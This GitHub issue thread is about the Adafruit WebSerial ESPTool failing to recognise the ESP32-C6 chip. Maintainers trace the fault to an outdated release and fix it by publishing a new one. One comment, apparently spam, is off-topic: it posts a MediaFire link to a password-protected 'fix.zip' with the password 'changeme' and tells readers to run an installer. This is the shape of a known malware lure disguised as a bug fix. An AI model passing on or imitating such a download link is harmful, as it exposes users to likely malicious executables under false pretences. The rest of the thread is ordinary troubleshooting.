adafruit/Adafruit_WebSerial_ESPTool #265: Add/fix C6 support

BlitzCityDIY, 2024-08-26:
It looks like C6 support was added in a [previous pull request](https://github.com/adafruit/Adafruit_WebSerial_ESPTool/pull/106), however connecting the ESP32-C6 Feather fails with this:

```
ESP Web Flasher loaded.
Connecting...
Connected successfully.
Try hard reset.
[Object.debug:191] Finished read loop
Error: Unknown Chip: Hex: 0x2ce0806f Number: 752910447
```

The board can be programmed with [espressif's tool](https://espressif.github.io/esptool-js/), but it would be nice to be able to use the Adafruit tool with upcoming C6 boards.

brentru, 2024-08-26:
@tyeth  We use webserial esptool for IO, did you mention it was working with C6 too?

ChangjingZhang, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

makermelissa, 2024-08-26:
Oh, hmm. Hopefully it's as simple as fixing a few numbers.

tyeth, 2024-08-26:
Yeah it's working on the C6 feather just pulling in the js files (not website code) for Wippersnapper and the wippersnapper web flasher / installer step.

makermelissa, 2024-08-26:
Hmm, just tried locally and it worked. Weird.

makermelissa, 2024-08-26:
Ok, I was able to reproduce the issue by loading index.html.

makermelissa, 2024-08-26:
Ok, I think it was as simple as making a new release, which the live version uses, but the local does not.

makermelissa, 2024-08-26:
Ok, made a new release, pointed to new release, and voila, it's working!